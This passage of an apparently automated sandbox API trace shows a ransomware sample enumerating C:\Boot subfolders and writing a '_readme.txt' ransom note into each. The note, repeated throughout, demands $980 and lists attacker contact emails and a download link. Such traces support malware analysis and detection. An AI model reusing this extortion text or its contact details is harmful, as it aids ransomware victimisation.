out: hHeap=0x630000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.180] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.180] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0094.180] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.180] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.180] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.180] PathFindFileNameW (pszPath="") returned="" [0094.180] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.181] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.181] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.181] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.182] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0094.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.182] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0094.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.182] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.182] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.183] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.184] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.184] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.185] CloseHandle (hObject=0x5c8) returned 1 [0094.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.186] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1aba640, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.186] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1aba640, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.186] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.186] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1aba640, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.186] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1aba640, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.186] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.187] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.188] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0094.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.188] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.188] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.188] PathFindFileNameW (pszPath="") returned="" [0094.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.188] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.189] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.189] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0094.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.189] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.189] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0094.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.189] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0094.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.190] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.190] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and 